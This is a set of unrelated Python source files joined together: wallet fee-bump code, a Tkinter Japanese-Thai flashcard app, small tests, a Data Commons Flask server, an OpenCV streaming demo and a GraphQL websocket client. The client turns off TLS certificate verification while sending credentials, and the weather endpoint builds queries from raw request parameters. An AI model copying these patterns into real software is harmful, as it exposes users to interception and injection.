is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
|
YiPun.py
|
from tkinter import *
from tkinter import ttk
from tkinter.ttk import Notebook
from tkinter import messagebox
import random
from googletrans import Translator
import os
from gtts import gTTS
from playsound import playsound
import csv
from threading import Thread
###############
'''
L = ["pip install gtts \n",
"pip install playsound \n",
"pip install googletrans\n",
"https://www.lfd.uci.edu/~gohlke/pythonlibs/#pyaudio \n",
"flashcard.ico \n",
"tab_flashcard.png \n",
"tab_vocab.png \n",
"translate.png \n",]
'''
deletemp3 = True
allfolder = os.listdir()
#############WRITE CSV IF NOT IN CURRENT FOLDER #############
def writevocab():
data = [['こんにちは','สวัสดีตอนกลางวัน'],
['こんばんは','สวัสดีตอนเย็น']]
with open('vocab.csv','w',newline='',encoding='utf-8') as f:
fw = csv.writer(f)
fw.writerows(data)
if 'vocab.csv' not in allfolder:
writevocab()
############# READ VOCAB.CSV FUNCTION #############
def readvocab():
with open('vocab.csv',newline='',encoding='utf-8') as f:
fr = csv.reader(f)
conf = list(fr)
print(conf)
return conf
############# DELETE MP3 IF IN FOLDER #############
if deletemp3:
for f in allfolder:
if f[-3:] == 'mp3':
os.remove(f)
randomnum = list(range(65,90)) #gen A-z for ascii
global playagain
playagain = True
def generatename():
nm = ''
for i in range(15):
rd = chr(random.choice(randomnum))
nm += rd
nm += '.mp3'
return nm
allfilename = []
################# READ VOCAB ##################
connection = False
global allvocab
allvocab = readvocab() #read vocab from vocab.csv inside current folder
allvocabdict = {}
def UpdateVocab():
global allvocab
v_statusbar.set('Updating Vocab...')
vocablist.delete(*vocablist.get_children())
print('Updating Vocab...')
allvocab = readvocab()
vclist = []
for vc in allvocab:
if vc[0] not in allvocabdict:
allvocabdict[vc[0]] = vc[1]
vclist.append(vc)
for v in vclist:
vocablist.insert('','end',value=v)
#################GOOGLE SHEET##################
GUI = Tk()
GUI.title('YiPun by Uncle Engineer v.0.0.1')
GUI.geometry('1100x600+0+0')
GUI.state('zoomed')
try:
GUI.iconbitmap('flashcard.ico')
except:
pass
menubar = Menu(GUI)
GUI.config(menu=menubar)
filemenu = Menu(menubar,tearoff=0)
# filemenu.add_command(label='Close', command=GUI.quit)
menubar.add_cascade(label='File',menu=filemenu)
filemenu.add_command(label='Exit',command=lambda: GUI.withdraw())
vocabmenu = Menu(menubar,tearoff=0)
#vocabmenu.add_command(label='Update Vocab',command=UpdateVocab)
vocabmenu.add_command(label='Add Vocab',command=lambda x=None: (Tab.select(F3),E1.focus()))
menubar.add_cascade(label='Vocab',menu=vocabmenu)
import webbrowser
def ContactUs():
url = 'http://uncle-engineer.com'
webbrowser.open(url)
def UncleEngineer():
url = 'https://www.facebook.com/UncleEngineer'
webbrowser.open(url)
def Documentation():
url = 'https://github.com/UncleEngineer/YiPun'
webbrowser.open(url)
helpmenu = Menu(menubar,tearoff=0)
helpmenu.add_command(label='Contact Us',command=ContactUs)
helpmenu.add_command(label='Donate',command=lambda: messagebox.showinfo('Donate','Paypal: [email protected]\nName: Uncle Engineer'))
helpmenu.add_command(label='Uncle Engineer',command=UncleEngineer)
helpmenu.add_command(label='Documentation',command=Documentation)
menubar.add_cascade(label='Help',menu=helpmenu)
Font = ('TH Sarabun',16)
TKFont = ttk.Style()
TKFont.configure('TButton', font=('TH Sarabun', 12))
Tab = Notebook(GUI)
F1 = Frame(Tab)
F2 = Frame(Tab)
F3 = Frame(Tab)
Tab.pack(fill=BOTH, expand=1)
try:
flashcard = PhotoImage(file='tab_flashcard.png')
vocab = PhotoImage(file='tab_vocab.png')
transicon = PhotoImage(file='translate.png')
Tab.add(F1, text='Flashcard', image=flashcard,compound='top')
Tab.add(F2, text='All vocab', image=vocab,compound='top')
Tab.add(F3, text='Translate', image=transicon,compound='top')
except:
Tab.add(F1, text='Flashcard')
Tab.add(F2, text='All vocab')
Tab.add(F3, text='Translate')
global current_vocab
current_vocab = None
global checked
checked = False
def RandomFlashcard(event=None):
v_check.set('')
global checked
checked =False
vc = random.choice(allvocab)
global current_vocab
current_vocab = vc
print(vc)
v_vocab.set(vc[0])
v_trans.set('')
global playagain
playagain = True
def ShowTranslate(event=None):
v_trans.set(current_vocab[1])
def CheckTranslate(event=None):
global checked
print([v_check.get()],[current_vocab[1]])
if v_check.get() == current_vocab[1].replace(' ','') and checked != True:
v_score.set(int(v_score.get()) + 1)
checked = True
#RandomFlashcard() #uncomment this if autonextword
v_trans.set(current_vocab[1])
##########################
def SpeakNow(event=None):
print(allfilename)
print(v_vocab.get())
global playagain
tts = gTTS(text=v_vocab.get(), lang='ja')
if playagain == True:
name = generatename()
allfilename.append(name)
tts.save(name)
playagain = False
if len(allfilename) > 1:
os.remove(allfilename[0])
del allfilename[0]
playsound(allfilename[0])
def SpeakNow2(event=None):
#v_translatenow.get()
global playagain
if v_radio.get() == 'ja':
tts = gTTS(text=v_transvocab.get(), lang='ja')
elif v_radio.get() == 'th':
tts = gTTS(text=v_transvocab.get(), lang='th')
else:
tts = gTTS(text=v_transvocab.get(), lang='en')
if playagain == True:
name = generatename()
allfilename.append(name)
tts.save(name)
playagain = False
if len(allfilename) > 1:
os.remove(allfilename[0])
del allfilename[0]
playsound(allfilename[0])
GUI.bind('<F4>',SpeakNow2)
def SpeakNow3(vocab_sound):
#v_translatenow.get()
global playagain
tts = gTTS(text=vocab_sound, lang='ja')
if playagain == True:
name = generatename()
allfilename.append(name)
tts.save(name)
playagain = True
if len(allfilename) > 1:
os.remove(allfilename[0])
del allfilename[0]
playsound(allfilename[0])
##########################
FB0 = Frame(F1)
FB0.place(x=100,y=200)
check_label = ttk.Label(FB0,text='ตรวจความหมาย',font=('Angsana New',20))
check_label.grid(row=0,column=0)
v_check = StringVar()
check_vocab = ttk.Entry(FB0,textvariable=v_check,font=('Angsana New',20),width=50)
check_vocab.grid(row=0,column=1,padx=20,pady=20)
check_vocab.focus()
#### BIND #####
check_vocab.bind('<Return>',CheckTranslate)
GUI.bind('<F1>',RandomFlashcard)
GUI.bind('<F2>',ShowTranslate)
FB1 = Frame(F1)
FB1.place(x=100,y=300)
nextvocab = ttk.Button(FB1,text='คำศัพท์ถัดไป',command=RandomFlashcard)
nextvocab.grid(row=1,column=1,padx=20,ipadx=20,ipady=10)
nextvocab = ttk.Button(FB1,text='โชว์คำแปล',command=ShowTranslate)
nextvocab.grid(row=1,column=2,padx=20,ipadx=20,ipady=10)
checkvocab = ttk.Button(FB1,text='เช็คคำแปล',command=CheckTranslate)
checkvocab.grid(row=1,column=3,padx=20,ipadx=20,ipady=10)
speak = ttk.Button(FB1,text='อ่านออกเสียง',command=SpeakNow)
speak.grid(row=1,column=4,padx=20,ipadx=20,ipady=10)
GUI.bind('<F3>',SpeakNow)
#######LABEL VOCAB########
#FB2 = Frame(F1)
#FB2.place(x=100,y=50)
v_vocab = StringVar()
v_trans = StringVar()
show_vocab = ttk.Label(F1, textvariable=v_vocab,font=('Angsana New',50,'bold'))
show_vocab.place(x=100,y=20)
show_translate = ttk.Label(F1, textvariable=v_trans,font=('Angsana New',30,'bold'),foreground='green')
show_translate.place(x=100,y=100)
v_score = StringVar()
v_score.set('0')
score_label =ttk.Label(F1,text='คะแนน',font=('Angsana New',30))
score_label.place(x=50,y=400)
score = ttk.Label(F1, textvariable=v_score,font=('Angsana New',30,'bold'),foreground='red')
score.place(x=150,y=400)
def SoundTreeview(event=None):
global playagain
try:
select = vocablist.selection()
data = vocablist.item(select)
print(data)
vocabsound = data['values'][0]
SpeakNow3(vocabsound)
playagain == False
except:
messagebox.showinfo('Please Select Row','กรุณาเลือกคำศัพท์ก่อน')
############## TAB2 #############
def ReplaceVocab(event=None):
data = []
for k,v in allvocabdict.items():
dt = [k,v]
print(dt)
data.append(dt)
with open('vocab.csv','w',newline='',encoding='utf-8') as f:
fw = csv.writer(f)
fw.writerows(data)
UpdateVocab()
CountVocab()
def UpdateMeaningVocab(vocab,trans):
global allvocabdict
allvocabdict[vocab] = trans
ReplaceVocab()
UpdateVocab()
CountVocab()
GUI.bind('<F12>',ReplaceVocab)
def DeleleVocab(event=None):
try:
select = vocablist.selection()
print('SELECT ID', select)
if len(select) == 1:
data = vocablist.item(select)
selectvocab = data['values'][0]
print('Deleting..',selectvocab)
del allvocabdict[selectvocab]
ReplaceVocab()
else:
for sl in select:
data = vocablist.item(sl)
selectvocab = data['values'][0]
print('Deleting..',selectvocab)
del allvocabdict[selectvocab]
ReplaceVocab()
selectvocab = data['values'][0] #ดักจับ error
except:
print('ERROR')
def UpdateVocabUI(event=None):
try:
select = vocablist.selection()
print('SELECT ID', select)
data = vocablist.item(select)
v1 = data['values'][0]
v2 = data['values'][1]
def SaveVocab(event=None):
nv1 = v_updatevocab.get()
nv2 = v_updatevocab2.get()
UpdateMeaningVocab(nv1,nv2)
print(f'Updated: {nv1} to {nv2}')
GUI2.withdraw()
GUI2 = Toplevel()
GUI2.geometry('400x250+0+0')
GUI2.title('Update Meaning')
v_updatevocab = StringVar()
v_updatevocab.set(v1)
v_updatevocab2 = StringVar()
v_updatevocab2.set(v2)
EM1 = ttk.Entry(GUI2,textvariable=v_updatevocab,font=(None,20,'bold'))
EM1.pack(pady=10)
EM2 = ttk.Entry(GUI2,textvariable=v_updatevocab2,font=(None,20))
EM2.pack(pady=10)
EM2.bind('<Return>',SaveVocab)
EM2.focus()
BS = ttk.Button(GUI2,text='Save',command=SaveVocab)
BS.pack(ipadx=20,ipady=20)
GUI2.bind('<Escape>',lambda x: GUI2.withdraw())
GUI2.mainloop()
except:
messagebox.showwarning('Please Select Vocab','กรุณาเลือกคำศัพท์ที่ต้องการแก้ไขก่อน')
v_countvocab = StringVar()
L1 = ttk.Label(F2,text='คำศัพท์ทั้งหมด:',font=('Angsana New',20)).place(x=50,y=30)
L1 = ttk.Label(F2,textvariable=v_countvocab,font=('Angsana New',20)).place(x=200,y=30)
L2 = ttk.Label(F2,text='ดับเบิลคลิกเพื่อฟังเสียง',font=('Angsana New',15)).place(x=50,y=600)
header = ['Vocab','Translation']
vocablist = ttk.Treeview(F2, columns=header, show='headings',height=10)
vocablist.place(x=20,y=80)
###############
def RunSoundTreeview(event=None):
v_statusbar.set('Play Sound...')
task = Thread(target=SoundTreeview)
task.start()
vocablist.bind('<Double-1>', RunSoundTreeview)
vocablist.bind('<Delete>',DeleleVocab)
vocablist.bind('<F11>',UpdateVocabUI)
#### Right Click Menu ####
deletemenu = Menu(GUI,tearoff=0)
deletemenu.add_command(label='Delete Vocab',command=DeleleVocab)
deletemenu.add_command(label='Change Meaning',command=UpdateVocabUI)
def popup(event):
deletemenu.post(event.x_root,event.y_root)
vocablist.bind('<Button-3>',popup)
for hd in header:
#tree.column("#0",minwidth=0,width=100, stretch=NO)
vocablist.heading(hd,text=hd)
headerwidth = [(100,600),(100,400)]
for hd,W in zip(header,headerwidth):
vocablist.column(hd,minwidth=W[0],width=W[1])
# for vc in allvocab:
# if vc[0] not in allvocabdict:
# vocablist.insert('','end',value=vc)
# allvocabdict[vc[0]] = vc[1]
style = ttk.Style()
style.configure("Treeview.Heading", font=('Angsana New', 30))
style.configure("Treeview", font=('Angsana New', 20),rowheight=40)
scrolling = ttk.Scrollbar(F2, orient="vertical", command=vocablist.yview)
scrolling.pack(side='right',fill='y')
vocablist.configure(yscrollcommand=scrolling.set)
##############################
def add_vocab(list_data):
with open('vocab.csv','a',newline='',encoding='utf-8') as f:
fw = csv.writer(f)
fw.writerow(list_data)
Lam = Translator()
v_jisho = StringVar()
def TranslateNow(event=None):
print(v_radio.get(), v_texttras.get())
EB2.config(state='normal') # ทำให้ปุ่มอ่านออกเสียงกลับมากดได้
trans = Lam.translate(v_texttras.get(),dest=v_radio.get())
v_jisho.set(trans.text)
alltext = ''
alltext += trans.text
if trans.pronunciation != None and v_radio.get() == 'ja':
alltext += '\nคำอ่าน: ' + trans.pronunciation
v_translatenow.set(alltext)
v_transvocab.set(trans.text)
if savetosheet.get() == 1:
try:
if v_radio2.get() == 'google':
texttrans = trans.text
else:
texttrans = v_manualtrans.get()
if v_radio.get() == 'th' or v_radio.get() == 'en':
if v_texttras.get() not in allvocabdict:
add_vocab([v_texttras.get(),texttrans])
else:
if v_texttras.get() not in allvocabdict:
add_vocab([texttrans,v_texttras.get()])
v_statusbar.set('บันทึกคำศัพท์ลงฐานข้อมูลสำเร็จ')
UpdateVocab()
CountVocab()
except:
print('Can not save')
global playagain
playagain = True
L1 = ttk.Label(F3, text = 'กรุณาพิมพ์คำศัพท์/ประโยคที่ต้องการแปล',font=('Angsana New',20))
L1.pack(pady=10)
FR0 = ttk.LabelFrame(F3,text='แปลเป็นภาษา')
FR0.pack()
v_radio = StringVar()
RB1 = ttk.Radiobutton(FR0,text=' Japanese',variable=v_radio,value='ja')
RB2 = ttk.Radiobutton(FR0,text=' Thai ',variable=v_radio,value='th')
RB3 = ttk.Radiobutton(FR0,text='English ',variable=v_radio,value='en')
RB1.invoke()
RB1.grid(row=0,column=1,pady=5,padx=10)
RB2.grid(row=0,column=2,pady=5,padx=10)
RB3.grid(row=0,column=3,pady=5,padx=10)
FR1 = ttk.LabelFrame(F3,text='แปลอัตโนมัติ / ด้วยตัวเอง')
FR1.pack(pady=10)
def ShowTranslateManual(event=None):
if v_radio2.get() == 'google':
try:
LM2.grid_forget()
E2.grid_forget()
except:
pass
else:
LM2.grid(row=0,column=0)
E2.grid(row=1,column=0)
# ทำให้ปุ่มกดอ่านออกเสียงกดไม่ได้
def disabletexttospeech(event=None):
EB2.config(state='disabled')
v_radio2 = StringVar()
RB3 = ttk.Radiobutton(FR1,text='Google Translate',variable=v_radio2,value='google',command=ShowTranslateManual)
RB4 = ttk.Radiobutton(FR1,text='Manual Translate',variable=v_radio2,value='manual',command=ShowTranslateManual)
RB3.invoke()
RB3.grid(row=0,column=3,pady=5,padx=10)
RB4.grid(row=0,column=4,pady=5,padx=10)
savetosheet = IntVar()
savetosheet.set(0)
cbtn = ttk.Checkbutton(F3,text='Save to Database',variable=savetosheet)
cbtn.pack()
# if connection == False:
# cbtn.config(state='disabled')
v_texttras = StringVar() #เก็บสิ่งที่เราพิมพ์ไว้
E1 = ttk.Entry(F3, textvariable = v_texttras,font=('Angsana New',20),width=70)
E1.pack(pady=10)
E1.bind('<KeyPress>', disabletexttospeech)
E1.bind('<Return>',TranslateNow)
FLM = Frame(F3)
FLM.pack()
LM2 = ttk.Label(FLM,text='Manual Translate')
LM2.grid(row=0,column=0)
v_manualtrans = StringVar() #เก็บสิ่งที่เราพิมพ์ไว้
E2 = ttk.Entry(FLM, textvariable = v_manualtrans,font=('Angsana New',20),width=70)
E2.grid(row=1,column=0)
E2.bind('<Return>',TranslateNow)
EBF = Frame(F3)
EBF.pack(pady=20,ipadx=20,ipady=10)
EB1 = ttk.Button(EBF,text='แปล',command=TranslateNow)
EB1.grid(row=0,column=0,padx=10,ipadx=15,ipady=10)
EB2 = ttk.Button(EBF,text='อ่านออกเสียง',command=SpeakNow2, state='disable')
EB2.grid(row=0,column=1,padx=10,ipadx=15,ipady=10)
#EB3 = ttk.Button(EBF,text='อ่านออกเสียง (ความหมายญี่ปุ่น)',command=SpeakNow3)
#EB3.grid(row=0,column=2,padx=10,ipadx=15,ipady=10)
v_transvocab =StringVar()
v_translatenow = StringVar()
v_translatenow.set('----Result----')
F31 = Frame(F3)
F31.pack(pady=20)
trans_label =ttk.Label(F31,text='คำแปล',font=('Angsana New',30))
trans_label.pack()
resulttext = ttk.Label(F31, textvariable=v_translatenow,font=('Angsana New',30,'bold'),foreground='red')
resulttext.pack()
# hide manual translation in the first time
LM2.grid_forget()
E2.grid_forget()
def JishoWeb(event=None):
gettext = v_jisho.get()
if len(gettext) > 0:
url = 'https://jisho.org/search/'+ gettext
webbrowser.open(url)
GUI.bind('<F5>',JishoWeb)
def on_click(event):
#print('widget:', event.widget)
#print('x:', event.x)
#print('y:', event.y)
#selected = nb.identify(event.x, event.y)
#print('selected:', selected) # it's not usefull
clicked_tab = Tab.tk.call(Tab._w, "identify", "tab", event.x, event.y)
#print('clicked tab:', clicked_tab)
active_tab = Tab.index(Tab.select())
#print(' active tab:', active_tab)
if clicked_tab == 2:
E1.focus()
elif clicked_tab == 1:
RandomFlashcard()
# if clicked_tab == active_tab:
# Tab.forget(clicked_tab)
def CountVocab():
count = len(allvocabdict)
v_countvocab.set(count)
Tab.bind('<Button-1>', on_click)
##### STATUS BAR ####
v_statusbar = StringVar()
statusbar = Label(F3, textvariable=v_statusbar, bd=1, relief=SUNKEN, anchor='w')
statusbar.pack(side=BOTTOM, fill=X)
UpdateVocab()
print('CURRENT VOCAB: ',allvocabdict)
CountVocab()
# def ChangeTab(event=None):
# Tab.select(F2)
# GUI.bind('<F9>',ChangeTab)
GUI.mainloop()
|
test_decorators.py
|
from datetime import datetime
from threading import Thread
from django.test import TestCase
from drf_util.decorators import await_process_decorator, await_checker, set_await
@await_process_decorator(5, 7)
def simple_print(text):
print(datetime.now(), text)
class DecoratorsTests(TestCase):
def test_await_process_decorator(self):
result = set_await("test", 2)
self.assertEqual(result, None)
result = await_checker("test", 2)
self.assertEqual(result, None)
for i in range(5):
thread = Thread(target=simple_print, kwargs={"text": "try #%s" % i})
# thread starting
print("start thread #", i)
thread.start()
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Copyright (c) 2018-2021 The CSPN Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test cspnd shutdown."""
from test_framework.test_framework import CSPNTestFramework
from test_framework.util import assert_equal, get_rpc_proxy, wait_until
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(CSPNTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
main.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Main entry module specified in app.yaml.
This module contains the request handler codes and the main app.
"""
import json
import logging
import os
import requests
import sys
import threading
import time
import flask
from flask import request
import services.datacommons as dc
from lib import translator
from __init__ import create_app
from cache import cache
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(levelname)s %(lineno)d : %(message)s')
app = create_app()
app.jinja_env.globals['GA_ACCOUNT'] = app.config['GA_ACCOUNT']
app.jinja_env.globals['PRIVATE'] = app.config['PRIVATE']
app.jinja_env.globals['SUSTAINABILITY'] = app.config['SUSTAINABILITY']
app.jinja_env.globals['NAME'] = app.config['NAME']
app.jinja_env.globals['BASE_HTML'] = 'sustainability/base.html' if app.config[
'SUSTAINABILITY'] else 'base.html'
GCS_BUCKET = app.config['GCS_BUCKET']
_MAX_SEARCH_RESULTS = 1000
WARM_UP_ENDPOINTS = [
"/api/choropleth/geojson?placeDcid=country/USA&placeType=County",
"/api/place/parent/country/USA",
"/api/place/places-in-names?dcid=country/USA&placeType=County",
"/api/stats/set/series/within-place?parent_place=country/USA&child_type=County&stat_vars=Count_Person",
]
def send_warmup_requests():
logging.info("Sending warm up requests:")
for endpoint in WARM_UP_ENDPOINTS:
while True:
try:
resp = requests.get("http://127.0.0.1:8080" + endpoint)
if resp.status_code == 200:
break
except:
pass
time.sleep(1)
@app.before_request
def before_request():
scheme = request.headers.get('X-Forwarded-Proto')
if scheme and scheme == 'http' and request.url.startswith('http://'):
url = request.url.replace('http://', 'https://', 1)
code = 301
return flask.redirect(url, code=code)
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@cache.cached(timeout=3600 * 24)
@app.route('/api/placeid2dcid/<path:placeid>')
def api_placeid2dcid(placeid):
"""
API endpoint to get dcid based on place id.
This is to use together with the Google Maps Autocomplete API:
https://developers.google.com/places/web-service/autocomplete.
"""
if placeid in app.config['PLACEID2DCID']:
return app.config['PLACEID2DCID'][placeid]
else:
flask.abort(404, 'dcid not found for %s' % placeid)
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@app.route('/translator')
def translator_handler():
return flask.render_template('translator.html',
schema_mapping=translator.SCHEMA_MAPPING,
sample_query=translator.SAMPLE_QUERY)
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@app.route('/search')
def search():
return flask.render_template('search.html')
@app.route('/healthz')
def healthz():
return "very healthy"
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@app.route('/search_dc')
def search_dc():
"""Add DC API powered search for non-place searches temporarily"""
query_text = request.args.get('q', '')
max_results = int(request.args.get('l', _MAX_SEARCH_RESULTS))
search_response = dc.search(query_text, max_results)
# Convert from search results to template dictionary.
results = []
query_tokens = set(query_text.lower().split())
for section in search_response.get('section', []):
entities = []
for search_entity in section['entity']:
entity = {}
entity['name'] = search_entity['name']
entity['dcid'] = search_entity['dcid']
name_tokens = search_entity['name'].lower().split()
for i, t in enumerate(name_tokens):
name_tokens[i] = t.strip("'")
name_tokens = set(name_tokens)
if not name_tokens & query_tokens:
continue
entity['rank'] = len(name_tokens & query_tokens) / len(name_tokens |
query_tokens)
entities.append(entity)
entities = sorted(entities, key=lambda e: (e['rank']), reverse=True)
if entities:
results.append({
'type': section['typeName'],
'entities': entities,
})
return flask.render_template('search_dc.html',
query_text=query_text,
results=results)
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@app.route('/weather')
def get_weather():
dcid = request.args.get('dcid')
prop = request.args.get('prop')
period = request.args.get('period')
if not dcid:
flask.abort(400, 'Missing url parameter "dcid"')
if not prop:
flask.abort(400, 'Missing url parameter "prop"')
if not period:
flask.abort(400, 'Missing url parameter "period"')
query_string = ('SELECT ?date ?mean ?unit ?provId '
'WHERE {{'
' ?o typeOf {period}WeatherObservation .'
' ?o observedNode {dcid} .'
' ?o measuredProperty {prop} .'
' ?o observationDate ?date .'
' ?o unit ?unit .'
' ?o meanValue ?mean .'
' ?o provenance ?provId .}}').format(period=period,
dcid=dcid,
prop=prop)
_, rows = dc.query(query_string)
observations = []
for row in rows:
if ('value' not in row['cells'][0] or 'value' not in row['cells'][1] or
'value' not in row['cells'][2]):
continue
date = row['cells'][0]['value']
if date < '2000':
continue
text = 'mean {}: {} {}'.format(prop, row['cells'][1]['value'],
row['cells'][2]['value'])
observations.append({
'measuredProperty': prop,
'observationDate': date,
'meanValue': row['cells'][1]['value'],
'unit': row['cells'][2]['value'],
'text': text,
'provId': row['cells'][3]['value'],
})
return json.dumps(observations)
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@app.route('/mcf_playground')
def mcf_playground():
return flask.render_template('mcf_playground.html')
# TODO(shifucun): get branch cache version from mixer
@app.route('/version')
def version():
return flask.render_template('version.html',
website_hash=os.environ.get("WEBSITE_HASH"),
mixer_hash=os.environ.get("MIXER_HASH"),
bigtable=os.environ.get("BIG_TABLE"),
bigquery=os.environ.get("BIG_QUERY"))
if not (app.config["TEST"] or app.config["WEBDRIVER"]):
thread = threading.Thread(target=send_warmup_requests)
thread.start()
if __name__ == '__main__':
# This is used when running locally only. When deploying to GKE,
# a webserver process such as Gunicorn will serve the app.
logging.info("Run web server in local mode")
port = sys.argv[1] if len(sys.argv) >= 2 else 8080
app.run(host='127.0.0.1', port=port, debug=True)
|
videostream_example.py
|
import numpy as np
import cv2
from multiprocessing import Process
def send():
cap_send = cv2.VideoCapture('videotestsrc ! video/x-raw,framerate=20/1 ! videoscale ! videoconvert ! appsink', cv2.CAP_GSTREAMER)
out_send = cv2.VideoWriter('appsrc ! videoconvert ! x264enc tune=zerolatency bitrate=500 speed-preset=superfast ! rtph264pay ! udpsink host=127.0.0.1 port=5000',cv2.CAP_GSTREAMER,0, 20, (320,240), True)
if not cap_send.isOpened() or not out_send.isOpened():
print('VideoCapture or VideoWriter not opened')
exit(0)
while True:
ret,frame = cap_send.read()
if not ret:
print('empty frame')
break
out_send.write(frame)
cv2.imshow('send', frame)
if cv2.waitKey(1)&0xFF == ord('q'):
break
cap_send.release()
out_send.release()
def receive():
cap_receive = cv2.VideoCapture('udpsrc port=5000 caps = "application/x-rtp, media=(string)video, clock-rate=(int)90000, encoding-name=(string)H264, payload=(int)96" ! rtph264depay ! decodebin ! videoconvert ! appsink', cv2.CAP_GSTREAMER)
if not cap_receive.isOpened():
print('VideoCapture not opened')
exit(0)
while True:
ret,frame = cap_receive.read()
if not ret:
print('empty frame')
break
cv2.imshow('receive', frame)
if cv2.waitKey(1)&0xFF == ord('q'):
break
cap_receive.release()
if __name__ == '__main__':
print(cv2.getBuildInformation())
# s = Process(target=send)
r = Process(target=receive)
# s.start()
r.start()
# s.join()
r.join()
cv2.destroyAllWindows()
|
subscription_client.py
|
#!/usr/bin/env python3
# Copyright (c) 2004-present Facebook All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
import json
import logging
import queue
import ssl
import threading
import uuid
from base64 import b64encode
from types import TracebackType
from typing import Any, Callable, Dict, Optional, Type
import websocket
CallbackType = Callable[[str, Dict[str, Any]], None]
GQL_WS_SUBPROTOCOL = "graphql-ws"
# all the message types
GQL_CONNECTION_INIT = "connection_init"
GQL_START = "start"
GQL_STOP = "stop"
GQL_CONNECTION_TERMINATE = "connection_terminate"
GQL_CONNECTION_ERROR = "connection_error"
GQL_CONNECTION_ACK = "connection_ack"
GQL_DATA = "data"
GQL_ERROR = "error"
GQL_COMPLETE = "complete"
GQL_CONNECTION_KEEP_ALIVE = "ka"
logging.basicConfig()
class ConnectionException(Exception):
"""Exception thrown during connection errors to the GraphQL server"""
class InvalidPayloadException(Exception):
"""Exception thrown if payload recived from server is mal-formed or cannot be parsed"""
class SubscriptionClient:
def __init__(self, url: str, username: str, password: str) -> None:
self.ws_url: str = url
self._connection_init_done = False
# cache of the headers for a session
self._headers: Optional[Dict[str, str]] = None
# map of subscriber id to a callback function
self._subscriber_callbacks: Dict[str, CallbackType] = {}
# our general receive queue
self._queue: queue.Queue[Dict[str, Any]] = queue.Queue()
# map of queues for each subscriber
self._subscriber_queues: Dict[str, queue.Queue[Dict[str, Any]]] = {}
self._shutdown_receiver = False
self.connect(username, password)
def connect(self, username: str, password: str) -> None:
"""
Initializes a connection with the server.
"""
user_and_pass = b64encode(f"{username}:{password}".encode("utf-8")).decode(
"ascii"
)
header = {"Authorization": "Basic %s" % user_and_pass}
self._connection = websocket.create_connection(
self.ws_url,
subprotocols=[GQL_WS_SUBPROTOCOL],
header=header,
sslopt={"cert_reqs": ssl.CERT_NONE},
)
# start the receiver thread
self._recevier_thread = threading.Thread(target=self._receiver_task)
self._recevier_thread.start()
def __dump_queues(self) -> None:
logging.debug("[GQL_CLIENT] => Dump of all the internal queues")
dumps = list(map(lambda q: (q[0], q[1].queue), self._subscriber_queues.items()))
logging.debug(f"[GQL_CLIENT] => Operation queues: \n {dumps}")
# wait for any valid message, while ignoring GQL_CONNECTION_KEEP_ALIVE
def _receiver_task(self) -> None:
"""the receive function of the client. Which validates response from the
server and queues data"""
while not self._shutdown_receiver:
self.__dump_queues()
res = self._connection.recv()
try:
msg = json.loads(res)
except json.JSONDecodeError as err:
logging.warning(
f"Ignoring. Server sent invalid JSON data: {res} \n {err}"
)
# ignore messages which are GQL_CONNECTION_KEEP_ALIVE
if msg["type"] != GQL_CONNECTION_KEEP_ALIVE:
# check all GQL_DATA and GQL_COMPLETE should have 'id'.
# Otherwise, server is sending malformed responses, error out!
if msg["type"] in [GQL_DATA, GQL_COMPLETE] and "id" not in msg:
# TODO: main thread can't catch this exception; setup
# exception queues. but this scenario will only happen with
# servers having glaring holes in implementing the protocol
# correctly, which is rare. hence this is not very urgent
raise InvalidPayloadException(
f'Protocol Violation.\nExpected "id" in {msg}, but could not find.'
)
# if the message has an id, it is meant for a particular operation
if "id" in msg:
op_id = msg["id"]
# put it in the correct operation/subscriber queue
if op_id not in self._subscriber_queues:
self._subscriber_queues[op_id] = queue.Queue()
self._subscriber_queues[op_id].put(msg)
# if a callback fn exists with the id, call it
if op_id in self._subscriber_callbacks:
user_fn = self._subscriber_callbacks[op_id]
user_fn(op_id, msg)
# if it doesn't have an id, put in the global queue
else:
self._queue.put(msg)
def _insert_subscriber(self, op_id: str, callback_fn: CallbackType) -> None:
